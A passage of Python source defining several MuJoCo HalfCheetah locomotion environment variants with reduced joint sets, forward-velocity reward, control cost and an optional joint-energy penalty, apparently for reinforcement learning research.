self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bfoot', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv6(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv6.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh', 'bshin', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bfoot','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv6(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofv6.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3doff(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_3dof_front.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
